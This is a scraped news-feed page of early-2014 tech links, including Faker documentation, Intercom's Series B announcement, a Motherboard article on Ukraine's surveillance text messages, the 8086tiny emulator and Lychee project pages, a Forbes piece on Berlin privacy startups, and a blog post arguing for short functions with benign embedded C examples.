$ python -m faker address
968 Bahringer Garden Apt. 722
Kristinaland, NJ 09890

Seeding the Generator

You may want to get always the same generated data - for instance when using Faker for unit testing purposes. The generator offers a seed() method, which seeds the random number generator. Calling the same script twice with the same seed produces the same results.

from faker import Faker
fake = Faker()
fake.seed(4321)
print fake.name() # Margaret Boehm

Tests

Run tests:

$ python setup.py test

or

$ python -m unittest -v faker.tests

Write documentation for providers:

$ python -m faker > docs.txt

License

Faker is released under the MIT Licence. See the bundled LICENSE file for details.

Credits

How a Silicon Valley outsider raised $30M in 30 months | Inside Intercom

$
0
0

Comments:"How a Silicon Valley outsider raised $30M in 30 months | Inside Intercom"

URL:http://insideintercom.io/silicon-valley-outsider-raised-30m-30-months/


I’m excited to announce today that we’ve raised a Series B round of $23M.

It was led by Bessemer, investors in iconic tech companies like LinkedIn, Yelp, Skype, Pinterest, Box, Twilio, Shopify, and many more, with participation by our Series A investors The Social+Capital Partnership. Ethan Kurzweil has joined the board alongside Mamoon, Des, and myself.

We founded Intercom 30 months ago. Before then, I was living in Ireland and knew very little about raising venture capital. We’ve now raised a total of $30M over three rounds. These are the lessons I’ve learned.

Aggressively expand your vision

One man’s Facebook is another man’s “online directory for colleges”—which is how Zuckerberg described his new service initially. In the defining days of any new category, there are dozens of people who happen upon the same fundamental idea. But very few have the capacity to see the true potential for it beyond the obvious.

Your vision is the ceiling for your company’s potential. You’ll never be a billion dollar business if you’re not deliberately working to get there. And in venture capital, it doesn’t make sense to invest in anyone who isn’t at least trying to build a business that size.

Intercom is our contribution to Internet innovation. Internet technologies are still catching up with how humans interact offline. The majority of progress in this space is on the consumer side—Facebook, WhatsApp, Snapchat, et al. Intercom is bringing this to business. It’s a seamless, lightweight way for the whole company to connect personally with their customers. The incumbents haven’t innovated in over a decade. In fact, the separate helpdesks, email marketing tools, feedback products, and CRMs have only become more complex. These disconnected services cannot provide a holistic view of the customer. And as a result, the customer’s experience is very disjointed. Our vision is to be at the center of all customer communication for all kinds of Internet business, which increasingly every business is becoming. We’re dedicated to going all the way with this.

Focus on engagement quality before engagement quantity

Startups talk a lot about traction as a measure of their potential. When they do, they roll out the biggest number they have—like the number of people who’ve blinked at their sign-up form. “Meaningful traction” might be something stronger—like an actual sign up. Yet that’s still missing the point. A better measure is engagement. How intensely are individuals or companies using your product?

Venture investors assess deals on the presumption that the vast majority of the market for the product is untapped, and that it’s extremely large. Otherwise it’s not a venture-stage opportunity with high growth potential. And so the number of customers or users you have will always be expected to be small in the grand scheme of things. However, you’ll need to show that those customers are highly engaged. That they’re extracting a lot of value. A small number of such data points—which for some companies could be as low as 10 customers—will help you demonstrate the potential that your product could have in the broader market.

We now have just under 2,000 paying companies—small teams like Circle and Visual.ly, and larger companies like Heroku and HootSuite—and annual revenue in the millions. But more importantly, 65% of our monthly active users log in to Intercom every week, and 35% of our weekly active users log in 5 days per week. And while we’ve a lot to improve, customer satisfaction is off the charts.

Hire out of your league

I’ve heard the idea many times that goes something like: “angel investors bet on people, seed investors bet on product, Series A investors bet on a business…” It’s true that at a higher valuation and raise amount, and with more time spent on the business, there will be increased expectation of progress. But what shouldn’t be drawn from this is any idea that team becomes less important, at any stage. Even public companies’ stock price is affected by investor confidence in the management—study the rise and fall in the price of Yahoo! and Apple since their changes in leadership, respectively.

Mamoon once said to me: “My hiring philosophy is aim high. Get people you think you can’t get. Shock people that you were able to get a certain person.” This is the only approach that results in a step-change in average talent amongst a team. The opposite is a plateau in team quality—getting bigger, but not better. Great people attract great people and companies who adopt a culture of always stretching to get the very best have been shown time and time again to be the most successful. Furthermore, experienced leaders build significantly bigger businesses—“the typical successful founder [has] at least 6-10 years of industry experience”.

We started 2013 with 13 people and finished with 47—all uniquely amazing in ways I’m surprised by daily. In May we announced we had hired ex Google and Facebook manager, Paul Adams, now our VP of Product. And I’m delighted to announce today that we’ve hired ex PayPal and Yammer exec, Mark Woolway, as COO. Mark now runs finance, operations, legal, HR, recruiting, and administration, and has had a tremendous impact in only one month. He’s certainly out of my league—he’s worked for three CEOs in his career: Peter Thiel, Elon Musk, and David Sacks. For PayPal he helped raise over $200M in venture capital, led their IPO, and eventual acquisition by eBay for $1.6B. He was Managing Director for Thiel’s hedge fund, Clarium Capital, at its peak worth $8B. And as Executive Vice President at Yammer, he raised $127M and led the deal in which Microsoft acquired the company for $1.2B. People like Mark make everyone up their game, and raise the bar for what success looks like. I’m thrilled to call him a colleague. And by the way, we’re looking for a whole lot more.

Know your strategy and find investors who believe in it

There are many things we call “technology companies” whose unique value is not in fact defined by technology. This does not take from their achievement or worth to the world, but it can be useful to think about in terms of your own business strategy. Groupon, for example, is a very valuable company, yet its innovation is in its business model. It’s a promotions company with a web site—nobody uses Groupon for their amazing tech. The same can be said for many businesses with incredible sales or marketing.

Intercom does not have an interesting business model. We charge money for people to use our product. And we do not have incredible sales or marketing. We have no salespeople and made our first marketing hire one month ago. What we do have is an innovative product. Something that people can’t get elsewhere which does unique things for them. All of our value is in this technology. And our double-digit monthly growth comes from people liking it and sharing it with their friends. Our company will become more valuable mostly by investing in product. Making it better for those who use it today, and allowing it to be used on more platforms, in more markets.

When you can articulate your general business strategy, it’s far easier to know which investors will be most excited by your deal, and to make your partnership with them a long-term success. Mamoon agreed from the start that the bulk of our capital should be spent on product. On a Sunday in late December, the day before I pitched the Bessemer partnership, I met Ethan for a coffee. I suspected since my first interaction with him that we were on the same page, but I really wanted to hear him say it… I asked: “So if we do this deal, what are the kinds of things you think we should spend the money on?” He said quickly: “Product! I don’t think for the next five years you’d want to stop investing aggressively in product.” The right investor won’t ever want you to be something you’re not, because they’re investing in you for who you are and what you believe in. That’s your strategy. It defines the opportunity and makes you far easier to bet on. I feel so fortunate to have investors who support our passion for simply making an amazing product.

Thanks

It’s fair to say that fundraising is a pseudo-achievement. It doesn’t in itself create value. That comes from what you spend the money on. Yet it’s worth celebrating because of what you really have achieved to be able to convince smart people to back you. Today I’m celebrating the hard work of my incredible co-founders and teammates, and the courage of our early seed and Series A investors. But most importantly I’m celebrating our customers who’ve supported us and paid for our product in its infantile state. Thank you, thank you, thank you. We do this for you.

Maybe the Most Orwellian Text Message a Government's Ever Sent | Motherboard

$
0
0

Comments:"Maybe the Most Orwellian Text Message a Government's Ever Sent | Motherboard"

URL:http://motherboard.vice.com/en_ca/blog/maybe-the-most-orwellian-text-message-ever-sent


Ukraine's protests, now under cellphone surveillance. Image: Wikimedia

“Dear subscriber, you are registered as a participant in a mass disturbance.”

That's a text message that thousands of Ukrainian protesters spontaneously received on their cell phones today, as a new law prohibiting public demonstrations went into effect. It was the regime's police force, sending protesters the perfectly dystopian text message to accompany the newly minted, perfectly dystopian legislation. In fact, it's downright Orwellian (and I hate that adjective, and only use it when absolutely necessary, I swear).

But that's what this is: it's technology employed to detect noncompliance, to hone in on dissent. The NY Times reports that the "Ukrainian government used telephone technology to pinpoint the locations of cell phones in use near clashes between riot police officers and protesters early on Tuesday." Near. Using a cell phone near a clash lands you on the regime's hit list. 

See, Kiev is tearing itself to shreds right now, but since we're kind of burned out on protests, riots, and revolutions at the moment, it's being treated below-the-fold news. Somehow, the fact that over a million people are marching, camping out, and battling with Ukraine's increasingly authoritarian government is barely making a ripple behind such blockbuster news bits as bridge closures and polar vortexes. Yes, even though protesters are literally building catapaults and wearing medieval armor and manning flaming dump trucks.

Hopefully news of the nascent techno-security state will turn some heads—it's right out of 1984, or, more recently, Elysium: technology deployed to "detect" dissent. Again, this tech appears to be highly arbitrary; anyone near the protest is liable to be labeled a "participant," as if targeting protesters directly and so broadly wasn't bad enough in the first place.

It's further reminder that authoritarian regimes are exploiting the very technology once celebrated as a vehicle for liberation; last year, in Turkey, you'll recall, the state rounded up dissident Twitter users. Now, Ukraine is tracing the phone signal directly. Dictators have already proved plenty adept at pulling the plug on the internet altogether.

All of this puts lie to the lately-popular mythology that technology is inherently a liberating force—with the right hack, it can oppress just as easily.

 

Reach this writer at brian.merchant(at)vice.com and on Twitter, at @bcmerchant

 

More Dystopian Drift:

With Unprecedented Inequality, the US Looks More Like a Dystopia Than Ever

Free the Network

Things Are Getting Orwellian at Exxon's Arkansas Oil Spill

Edward Snowden Says Our World Is Worse than '1984'

Unity Feedback - Platforms: Unity Editor for Linux

$
0
0

Comments:"Unity Feedback - Platforms: Unity Editor for Linux"

URL:http://feedback.unity3d.com/suggestions/platforms-unity-editor-for-linu


peniwize

Jan 22, 2014 17:13

I develop embedded gaming (slot) machines on Linux and I'm currently investigating Unity 3D (which is awesome, by the way). It's important for me to be able to use a native Unity editor on Linux since it's the only piece of software that binds me to either Windows or Mac, which significantly disrupts my work flow and slows my productivity. I would also love to be able to integrate Unity as a component of an executable INSTEAD of HAVING to use a generated executable and plugin(s) as this would SIGNIFICANTLY simplify my architecture. Anyway, PLEASE port the editor to Linux. Valve's work to support gaming on Linux and M$ going off the rails with Win 8/9 has created very strong motivation for game dev's to support Linux - and it's happening quickly. Us Linux gamers would LOVE to have Unity completely on board and along for the ride. Gaming is migrating to Linux. Embrace it. :-)

8086tiny: a tiny PC emulator/virtual machine - Home

$
0
0

Comments:"8086tiny: a tiny PC emulator/virtual machine - Home"

URL:http://www.megalith.co.uk/8086tiny/


About 8086tiny

8086tiny is a free, open source PC XT-compatible emulator/virtual machine written in C. It is, we believe, the smallest of its kind (the fully-commented source is under 25K). Despite its size, 8086tiny provides a highly accurate 8086 CPU emulation, together with support for PC peripherals including XT-style keyboard, floppy/hard disk, clock, and Hercules graphics. 8086tiny is powerful enough to run software like AutoCAD, Windows 3.0, and legacy PC games.

8086tiny is highly portable and runs on practically any little endian machine, from simple 32-bit MCUs upwards. 8086tiny has successfully been deployed on 32-bit/64-bit Intel machines (Windows, Mac OS X and Linux), Nexus 4/ARM (Android), iPad 3 and iPhone 5S (iOS), and Raspberry Pi (Linux).

The philosophy of 8086tiny is to keep the code base as small as possible, and through the open source license encourage individual developers to tune and extend it as per their specific requirements, adding support, for example, for more complex instruction sets (e.g. Pentium) or peripherals (e.g. mouse). Any questions, comments or suggestions are very welcome in our forum.

An obfuscated version of 8086tiny (condensed into just 4043 bytes of C code) was a winner of the 2013 IOCCC contest. Significant interest followed for a documented, commented, maintainable version. The result is the distribution presented here.

Feature Highlights

8086tiny's feature highlights include:

  • Highly accurate, complete 8086 CPU emulation (including undocumented features and behavior)
  • Support for all standard PC peripherals: keyboard, 3.5" floppy drive, hard drive, video (Hercules graphics and CGA color text mode, including direct video memory access), real-time clock, timers
  • Disk images are compatible with standard Windows/Mac/UNIX mount tools for simple interoperability
  • Complete source code provided (including custom BIOS)

8086tiny is highly portable, with minimal system requirements:

  • Minimal C runtime library support required (uses POSIX file I/O and time functions only - no memory management or string functions)
  • Uses SDL 1.2 for graphics, but can compile without SDL for text-only applications
  • Storage requirement: typically around 20KB for compiled binary, 9KB for BIOS image, and 720KB/1.44MB for floppy disk image
  • System RAM requirement: around 1.5MB

Applications

Some possible applications:

  • Run legacy PC software and games on modern hardware
  • Teach computer architecture and Intel assembly language in a safe, sandboxed environment
  • Deploy on Raspberry Pi to make the world's cheapest ($25) complete IBM-compatible PC
  • Extend the code base to develop a lean, modern-processor VM

If you develop an application that makes use of 8086tiny, and would like a link to it here, please get in touch.

License

8086tiny is free to use for any purpose, commercial or non-commercial, and is made available under a Creative Commons Attribution-ShareAlike 3.0 Unported License.

If 8086tiny brings you joy or profit, the author welcomes modest donations as a token of appreciation.

Lychee

$
0
0

Comments:"Lychee"

URL:http://lychee.electerious.com


Lychee 2.0 Photo-Management

Lychee is a free photo-management tool, which runs on your server or web-space. Installing is a matter of seconds. Upload, manage and share photos like from a native application. Lychee comes with everything you need and all your photos are stored securely.

Managing your photos has never been easier. Upload, move, rename, describe, delete or search your photos in seconds. All in one place, right from your browser.

Sharing like it should be. One click and every photo and album is ready for the public. You can also protect albums with passwords if you want. It's under your control.

Look at all your images in full-screen mode, navigate forward and backward by using your keyboard or let others enjoy your photos by making them public.

1

Upload your photos or create a new album for them.

2

See all the information form your photos.

3

Share your albums or photos with your favorite service.

4

Lychee looks and works perfectly on all your devices.

Lychee is completely open-source. Everyone can take advantage of the work we have already done and even improve it. We are open for every suggestion or help.

Your server, your data, your rules. Never depend on someone else. Lychee is a self-hosted solution, so you are in the full control of your photos.

Our goal was to create an web app everyone can use. Lychee works intuitive and comes with a stunning, beautiful interface.

If you enjoy Lychee, please consider a little donation.

- or -

Eric S. Raymond - clang and FSF's strategy


AMD Debuts New 12- and 16-Core Opteron 6300 Series Processors | techPowerUp

Germany's Privacy Stance Boosts Berlin's Tech Startups - Forbes

$
0
0

Comments:"Germany's Privacy Stance Boosts Berlin's Tech Startups - Forbes"

URL:http://www.forbes.com/sites/alisoncoleman/2014/01/20/germanys-privacy-stance-boosts-berlins-tech-start-ups/


English: Berlin at night. Seen from the Allianz building in Treptow, showing the Universal building on the right at the river Spree and the TV-Tower at Alexanderplatz (Photo credit: Wikipedia)

With hundreds of millions of Euros invested in its tech start ups the city of Berlin is a hotspot for innovative entrepreneurs looking to create the next big thing. Among the savviest are those with their head around Germany’s preoccupation for privacy.

The country takes privacy very seriously, as FaceBook discovered when it clashed with German data protection authorities over its facial recognition feature, deemed a violation of privacy laws. Google, too, fell foul of Germany’s stance on privacy  when public opposition to its Google Maps Street View feature forced it to abandon the German branch of the project.

However, post NSA and PRISM, this stance is serving the tech sector well, with investors showing a healthy interest in firms that are innovating in the online security and privacy arenas.

To understand Germany’s attitude to privacy we need to delve into its history. The country pioneered data protection law, but as a symptom of its past, explains Berlin-based technology journalist David Meyer.

“Both the Nazis and the Stasi were very big on surveillance, and part of their legacy was to instil a deep appreciation for privacy among the German people,” he says.

The Google Maps debacle is an illustration of this. The public backlash against Street View forced Google to offer Germans the option of having their houses blurred out, and ultimately to give up, when the scale of the response rendered the proposal financially unviable.

Germany also has an unusually large number of hackers and security experts, possibly a throwback to the country’s engineering tradition and its history.

And it has some of the world’s toughest data protection laws, so start ups creating services for the local market will, by default, be meeting or exceeding data protection compliance requirements in other countries.

In the wake of the Snowden revelations, smart tech entrepreneurs have seized the opportunities this presents.

Among them is internet encryption services provider ZenGuard  Bootstrapped by its two founders last summer, the company recently secured accelerator investment and angel funding, and is now drawing attention from a global VC audience.

“The firm’s next round of funding will be with international investors, we want our international reach to be reflected in our investor consortium,” says co founder and managing director Simon Specka.

ZenGuard has already established more than 70 servers in five locations across three continents. Clearly, while behaviour between markets may vary, the appetite for greater privacy protection amid unrestricted internet is global.

Berlin-based Blippex describes itself as a search engine ‘made by the people for the people’, built with user privacy in mind. With the option to anonymously provide data about the sites they visit and how long they spend there, users themselves are creating a search engine built on where real people are browsing, and therefore delivers more relevant results.

Another new arrival in the city’s tech hub, Arriver is a social navigation tool developed on the principle of neutrality; privacy through product design and business model, and designed for the mobile internet, a real place where people can be found in real life and in real time, as distinct from the virtual space of the internet.

Functions Should Be Short And Sweet, But Why?

$
0
0

Comments:"Functions Should Be Short And Sweet, But Why?"

URL:http://sam-koblenski.blogspot.ru/2014/01/functions-should-be-short-and-sweet-but.html


In my early days of programming, I would write functions good and long. Screen after screen of complicated logic and control structures would fill my coding projects with only a scant few mega functions dropped in to break things up a bit. It was years before things improved and I learned the value of splitting up those long stretches of coding logic into more manageable pieces. As I continue to improve as a programmer, I find that the functions I write keep getting shorter, more focused, and more numerous, and I keep seeing more benefits to this style of programming.

At first, the main barrier to small functions was likely the difficulty in learning to program in general. (By 'functions' I'm referring to all manner of parametrized blocks of code: functions and routines in procedural languages, methods in object-oriented languages, and lambdas and procedures in functional languages.) Functions are a hard concept to understand when they're first introduced, and to all appearances, it looks easier to write everything out in one long stream of logic. Getting the program to do what you want at all is hard enough, so why complicate things by having the execution path jump in and out of all kinds of functions as well? And once all of those chains of if-else statements and nested for loops are working, the last thing you want to do is change anything that could break it again.

Likely the most obvious value-add for functions becomes apparent when you start repeating code. Instead of copy-pasting those blocks of code, you can parametrize them into functions and reuse one block of code many times. The long road to the understanding of DRY has begun. Yet, you may resist breaking up your code into many more smaller functions because of the friction involved in doing so. After all, the code is working, and it seems like an awful lot of effort to refactor it all into functions of ten lines or less. Screen-length functions should be good enough, right?

Wrong. There are so many more benefits to writing short and sweet functions, but before getting into those benefits, let's look at an example that we can refer to.

An Example Command Interface


I've been writing a lot of embedded code in C/C++ over the last couple years, so examples in that vein come easily for me right now. For this example imagine you're implementing a command interface between a host processor and a slave processor that are connected over a serial communication protocol, like SPI or UART. A command packet will consist of a command, any associated parameters, and an optional block of data. The slave will receive command packets, process them, and reply with a response packet, or a simple acknowledgement if no response data is needed by the host. We'll keep it really simple and not allow the slave to initiate any commands.

When I first started programming, I might have implemented the slave's command processing as one massive function, and maybe broken off some repeated code blocks into functions after it was working. But that method of coding imposes a huge amount of cognitive overhead. It would be much simpler to start out with something like this:

voidIntHandler(){ 
 HostCommandhostCmd=HOST_CMD_READ; 
  IntDisable(INT_SPI0);
  SPIDataGet(SPI0_BASE,(unsignedlong*)&hostCmd); 
 HandleHostCommand(hostCmd);
  IntEnable(INT_SPI0);
}

This is the interrupt handler for when a SPI peripheral receives data over the serial interface and raises an interrupt in the slave processor. The function simply sets a default command, disables future interrupts, reads the command from the SPI peripheral, handles the command, and re-enables interrupts. The bulk of the work is done in the HandleHostCommand(hostCmd) function call, which looks like this:

voidHandleHostCommand(HostCommandhostCmd){
 switch(hostCmd)
 { 
 caseHOST_CMD_NOP:
    HandleNop();
   break;
 caseHOST_CMD_READ:
   HandleRead();
   break;
  caseHOST_CMD_SET_IP_ADDR:
   HandleSetIP(); 
   break;
 caseHOST_CMD_SET_CHANNEL_CONFIG: 
    HandleSetChannelConfig();
   break;
  /*
   * Many more commands and function calls.
   */
  default:
    HandleError();
   break;
 }
}

Again, this is a fairly straightforward function that focuses on one task - routing each incoming command to the function that will handle it. The implementation of each HandleXXX() function is equally simple. Here's the one for a NOP command:

void HandleNop() {
  SPIDataPut(SPI0_BASE, HOST_REPLY_POSACK);
}

This function is especially simple because it implements the no-operation command, which just echos a positive acknowledgement back to the host processor. Other command handling functions will be more complicated, but not by much. I could go on with more functions, but I think you get the idea. So other than making the functions dead simple, what are the advantages to coding this way?

Easier To Write


One of the incredible things about programming this way is that as you are writing, drilling down into each of these simple functions, you quickly realize where you can reuse one small function in another place. Even though it might seem like coding is a little slower to begin with, once you get a few levels deep in a complex task, all of a sudden you find that you're not writing as much logic. You're mostly calling functions you've already written, and the logic that you do still need to write is very straightforward.

Coding lots of smaller functions allows you to concentrate more easily on the task at hand instead of holding hundreds or thousands of lines of code in your head, and you can make good progress much more quickly and correctly. It also frees up mental resources for solving the more complicated problems in programming, which is what you really want to be spending your mental energy on.

Easier To Read


Besides making code easier to write, lots of short functions makes code much easier to read. That may be counter-intuitive because you would think having so many functions with only a handful of code in them would force you to jump around the code a lot more, searching for the implementation of this or that function. Most of the time that's not the case. More often than not, you're looking for a specific block of code to find and fix a bug or add a feature. Finding that code block is actually easier when you don't have to sift through hundreds of lines of irrelevant code in the same function, trying to decide if any of it influences the bug you're tracking down or if it it will break when you make a change. Once you find the right code, it's already isolated in a nice self-contained package that's easy to understand and change.

Reading and understanding code is also aided by the focused nature of small functions. In the command interface above, the code in each function exists firmly within one layer of abstraction. Low-level peripheral interface code is not mixed with higher level decision or control structures, which in turn is not mixed with book-keeping code. It's the Single Responsibility principle applied to functions. The purpose of each function is immediately apparent, and that helps considerably when you have to come back to it in six months (or five years) to make a change. Not to mention the fact that small functions are much more portable, making changes even easier.

Easier To Test


Long functions are notoriously hard to test. Making sure all code paths are covered and the code is functionally correct becomes a nightmare. If you add in interactions with hardware peripherals, like the example above, things get even more difficult because simulating what the embedded hardware does for offline testing is a real challenge. But testing the code above is quite easy. The functions that interface directly with the hardware can be mocked without the need to maintain complicated state for long, involved tests because the functions that use the hardware interface are short and simple.

Coming up with tests for each function is also straightforward because none of them do very much. For example, the tests for HandleHostCommand() just need to pass in each command and a few invalid commands and make sure the correct function is called each time. Nothing could be simpler.

Easier To Name Variables


One of the hardest problems in programming is naming variables, but when you drastically cut down the size of functions, naming becomes much easier because the amount of context that must be held in the variable name is smaller. If done right, variable names should get shorter as functions get shorter while their meaning becomes easier to understand and remember.

Imagine the complexity of the variable names that would be required if all of the command processing code was written in HandleHostCommand(). Command-specific variable names would quickly get out of hand, and there would be the unhealthy urge to reuse variables for multiple purposes. Both of those problems are neatly avoided by splitting the command processing into individual functions.

Easier To Self-Document


In Code Complete, Steve McConnell describes the Pseudocode Programming Process, where pseudocode is used to refine a routine until it reaches a point where it is easier to write the code than to write more pseudocode. Then the pseudocode is converted to comments and the code is written below each comment. Considering what I think of comments, McConnell didn't go far enough with his recommended process.

Each comment ends up redundantly describing the following code, making the comments essentially useless. Instead of writing code for each comment, coming up with a good function name and putting the code in the resulting functions would be a better approach. Then the code becomes more self-documenting, and the comments can either be removed to de-clutter the code or used as the function's documentation if necessary.

When code is structured with lots of small functions, the function names become a great way to describe what the code is doing directly in the code. Learning Ruby and Rails is making this advantage even more apparent to me. The omission of most parentheses in Ruby makes the code so easily readable that small functions are much more common and comments are used far less frequently. Most of that advantage can be carried over to other languages, and at least in the example above, comments wouldn't add much value to the code while increasing its verbosity drastically. That's not to say that comments should never be used, but their necessity is drastically reduced.

Make Your Life Easier


Of all of the advantages of writing small functions, the most profound is probably how easy it makes testing. Without short functions, testing can be completely overwhelming and is likely to be resisted or delayed to the detriment of the project. With short functions, tests practically write themselves, and if TDD (Test-Driven Development) is practiced, short functions tend to be the natural result of the tests that are written first.

Making testing easier should motivate you to write smaller functions all by itself. Making code easier to read, write, change, and document as well is even better. It took a long time to appreciate how beneficial it is to program this way because I couldn't get over the friction of creating all of those little functions. Try it. Write those short and sweet functions. It will free your mind.

Discuss this article on Hacker News.

Eigenstate.org::The home of Ori Bernstein on the Web.

Apparently It’s OK For iOS Apps To Ask For Your Apple ID And Password – Marco.org

Viewing all 9433 articles
Browse latest View live